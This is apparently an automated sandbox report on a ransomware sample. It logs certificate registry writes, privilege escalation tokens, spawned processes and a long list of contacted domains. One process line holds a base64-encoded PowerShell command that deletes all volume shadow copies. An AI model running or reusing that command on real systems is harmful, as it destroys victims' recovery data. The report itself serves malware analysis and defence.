ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186819000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe

"C:\Users\Admin\AppData\Local\Temp\735ff072077023765e445b284f072946ffad2e36fa8aba9f1b8f93fef885352c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 woodleyacademy.org udp
US 208.69.169.161:443 woodleyacademy.org tcp
US 8.8.8.8:53 bookspeopleplaces.com udp
US 3.234.189.133:443 bookspeopleplaces.com tcp
US 8.8.8.8:53 despedidascostablanca.es udp
US 8.8.8.8:53 161.169.69.208.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
FR 46.105.204.5:443 despedidascostablanca.es tcp
US 8.8.8.8:53 lapinvihreat.fi udp
FI 94.237.33.171:443 lapinvihreat.fi tcp
US 8.8.8.8:53 133.189.234.3.in-addr.arpa udp
US 8.8.8.8:53 5.204.105.46.in-addr.arpa udp
US 8.8.8.8:53 drfoyle.com udp
US 13.248.169.48:443 drfoyle.com tcp
US 8.8.8.8:53 carolinepenn.com udp
GB 77.68.103.74:443 carolinepenn.com tcp
US 8.8.8.8:53 171.33.237.94.in-addr.arpa udp
US 8.8.8.8:53 48.169.248.13.in-addr.arpa udp
US 8.8.8.8:53 74.103.68.77.in-addr.arpa udp
US 8.8.8.8:53 abuelos.com udp
US 50.18.94.53:443 abuelos.com tcp
US 8.8.8.8:53 53.94.18.50.in-addr.arpa udp
US 8.8.8.8:53 www.abuelos.com udp
US 50.18.94.53:443 www.abuelos.com tcp
US 8.8.8.8:53 groupe-frayssinet.fr udp
FR 162.19.75.184:443 groupe-frayssinet.fr tcp
US 8.8.8.8:53 frayssinet.fr udp
FR 162.19.75.184:443 frayssinet.fr tcp
US 8.8.8.8:53 tecnojobsnet.com udp
US 8.8.8.8:53 184.75.19.162.in-addr.arpa udp
US 104.21.64.1:443 tecnojobsnet.com tcp
US 104.21.64.1:443 tecnojobsnet.com tcp
US 104.21.64.1:443 tecnojobsnet.com tcp
US 8.8.8.8:53 deoudedorpskernnoordwijk.nl udp
NL 37.72.99.127:443 deoudedorpskernnoordwijk.nl tcp
US 8.8.8.8:53 siluet-decor.ru udp
US 8.8.8.8:53 smessier.com udp
US 8.8.8.8:53 calxplus.eu udp
US 8.8.8.8:53 julis-lsa.de udp
DE 185.53.177.20:443 julis-lsa.de tcp
US 8.8.8.8:53 1.64.21.104.in-addr.arpa udp
US 8.8.8.8:53 127.99.72.37.in-addr.arpa udp
US 8.8.8.8:53 aminaboutique247.com udp
US 8.8.8.8:53 pier40forall.org udp
US 15.197.148.33:443 pier40forall.org tcp
US 8.8.8.8:53 20.177.53.185.in-addr.arpa udp
US 8.8.8.8:53 coding-machine.com udp
FR 164.132.235.17:443 coding-machine.com tcp
US 8.8.8.8:53 33.148.197.15.in-addr.arpa udp
US 8.8.8.8:53 longislandelderlaw.com udp
US 160.153.0.194:443 longislandelderlaw.com tcp
US 8.8.8.8:53 17.235.132.164.in-addr.arpa udp
US 8.8.8.8:53 expandet.dk udp
US 104.21.16.1:443 expandet.dk tcp
US 8.8.8.8:53 194.0.153.160.in-addr.arpa udp
US 8.8.8.8:53 blogdecachorros.com udp
US 75.2.37.224:443 blogdecachorros.com tcp
US 8.8.8.8:53 grupocarvalhoerodrigues.com.br udp
US 8.8.8.8:53 1.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 the-virtualizer.com udp
FR 5.175.14.53:443 the-virtualizer.com tcp
US 8.8.8.8:53 kindersitze-vergleich.de udp
DE 185.159.123.48:443 kindersitze-vergleich.de tcp
US 8.8.8.8:53 224.37.2.75.in-addr.arpa udp
US 8.8.8.8:53 53.14.175.5.in-addr.arpa udp
US 8.8.8.8:53 edv-live.de udp
DE 202.61.195.82:443 edv-live.de tcp
US 8.8.8.8:53 48.123.159.185.in-addr.arpa udp
US 8.8.8.8:53 gasbarre.com udp
US 172.67.73.130:443 gasbarre.com tcp
US 8.8.8.8:53 www.gasbarre.com udp
US 172.67.73.130:443 www.gasbarre.com tcp
US 8.8.8.8:53 82.195.61.202.in-addr.arpa udp
US 8.8.8.8:53 130.73.67.172.in-addr.arpa udp
US 8.8.8.8:53 ulyssemarketing.com udp
US 8.8.8.8:53 thomasvicino.com udp
US 104.21.32.1:443 thomasvicino.com tcp
US 8.8.8.8:53 sevenadvertising.com udp
US 13.248.169.48:443 sevenadvertising.com tcp
US 8.8.8.8:53 1.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 sporthamper.com udp
CA 23.227.38.32:443 sporthamper.com tcp
US 8.8.8.8:53 myhostcloud.com udp
US 172.67.181.133:443 myhostcloud.com tcp
US 8.8.8.8:53 iviaggisonciliegie.it udp
GB 77.95.113.179:443 iviaggisonciliegie.it tcp
US 8.8.8.8:53 32.38.227.23.in-addr.arpa udp
US 8.8.8.8:53 133.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 plastidip.com.ar udp
AR 45.162.169.226:443 plastidip.com.ar tcp
US 8.8.8.8:53 179.113.95.77.in-addr.arpa udp
US 8.8.8.8:53 226.169.162.45.in-addr.arpa udp
US 8.8.8.8:53 zewatchers.com udp
FR 185.100.4.146:443 zewatchers.com tcp
US 8.8.8.8:53 saxtec.com udp
DE 134.255.237.119:443 saxtec.com tcp
US 8.8.8.8:53 braeutigam-media.com udp
US 76.76.21.21:443 braeutigam-media.com tcp
US 8.8.8.8:53 smale-opticiens.nl udp
NL 217.18.77.142:443 smale-opticiens.nl tcp
US 8.8.8.8:53 146.4.100.185.in-addr.arpa udp
US 8.8.8.8:53 119.237.255.134.in-addr.arpa udp
US 8.8.8.8:53 142.77.18.217.in-addr.arpa udp
US 8.8.8.8:53 haar-spange.com udp
US 8.8.8.8:53 zimmerei-deboer.de udp
DE 91.184.32.130:443 zimmerei-deboer.de tcp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
